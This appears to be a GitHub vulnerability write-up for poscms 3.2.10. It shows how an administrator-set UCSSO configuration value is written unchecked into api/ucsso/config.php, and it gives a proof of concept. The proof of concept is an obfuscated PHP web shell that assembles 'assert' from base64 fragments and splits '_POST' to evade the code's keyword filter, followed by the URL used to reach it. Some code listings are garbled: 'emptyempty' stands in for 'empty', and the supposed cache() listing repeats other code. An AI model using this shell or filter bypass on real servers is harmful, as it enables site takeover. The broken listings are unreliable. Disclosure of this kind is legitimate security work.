Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

edition

poscms 3.2.10

condition

you should be a Administrator

Code and Cause the cause:

the file of diy\module\member\controllers\admin\Setting.php,in the function of 'index'

1.	public function index() {  
2.	  
3.	$page = (int)$this->input->get('page');  
4.	$result = 0;  
5.	  
6.	if (IS_POST) {  
7.	    $post = $this->input->post('data');  
8.	    $page = (int)$this->input->post('page');  
9.	    // 规则判断  
10.	    if (emptyempty($post['regfield'])) {  
11.	        $this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
12.	    } elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {  
13.	        $this->admin_msg('开启邮件审核后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
14.	    } elseif (!in_array('email', $post['regfield']) && $post['ucenter'] == 1) {  
15.	        $this->admin_msg('开启Ucenter后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
16.	    } elseif (!in_array('phone', $post['regfield']) && $post['regverify'] == 3) {  
17.	        $this->admin_msg('开启手机验证码审核后,注册字段必须选择【手机】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
18.	    } elseif ($post['ucsso'] && $post['ucenter']) {  
19.	              $this->admin_msg('Ucenter和UCSSO不能同时开启', dr_url('member/setting/index', array('page'=> $page)), 0, 9);  
20.	          }  
21.	    $this->member_model->member($post); 
22.	    $data = $post; //用户的输入
23.	    $cache = $this->member_model->cache(); //进入对应的cache()函数 
24.	          $result = 1;  

in the twenty-third line member_model->cache();so we go to the file of diy\module\member\models\Member_model.php ,and in the funtion of cache,we can see:

1.	$page = (int)$this->input->get('page');
2.			$result = 0;
3.			
4.			if (IS_POST) {
5.				$post = $this->input->post('data');
6.				$page = (int)$this->input->post('page');
7.				// 规则判断
8.				if (empty($post['regfield'])) {
9.					$this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);//这里需要注意
10.				} elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {
11.	。。。。。。。。。。。。。。。。。。。。。。略过
12.	// 更新UCSSO配置  
13.	      if ($cache['setting']['ucsso']) {  
14.	          $ucsso = htmlspecialchars_decode($cache['setting']['ucssocfg']);  //vul
15.	          if (strpos($ucsso, 'eval') !== false  
16.	              || strpos($ucsso, '_POST') !== false  
17.	              || strpos($ucsso, '_REQUEST') !== false  
18.	              || strpos($ucsso, '_GET') !== false) {  
19.	              return;  
20.	          }  
21.	          file_put_contents(WEBPATH.'api/ucsso/config.php', $ucsso , LOCK_EX);  //vul
22.	      }  
23.	  
24.	      $this->ci->clear_cache('member');  
25.	      $this->dcache->set('member', $cache);  
26.	  
27.	      return $cache;  
28.	  }  

because user can control the value of $cache['setting']['ucssocfg'] ,then in the twenty-first lines we can write evail code into the file of api/ucsso/config.php

Harm

Allows attackers to getshell

poc

一.

1

the code of shell can be

<?php    
error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>

the post it the file of api\ucsso\config.php will become it.then you can getshell by requesting http://127.0.0.1:8888/index.php?c=myndtt&m=index

img

note : if you can't success,may the package that you post not include the 'regfield' you should add it like this:

img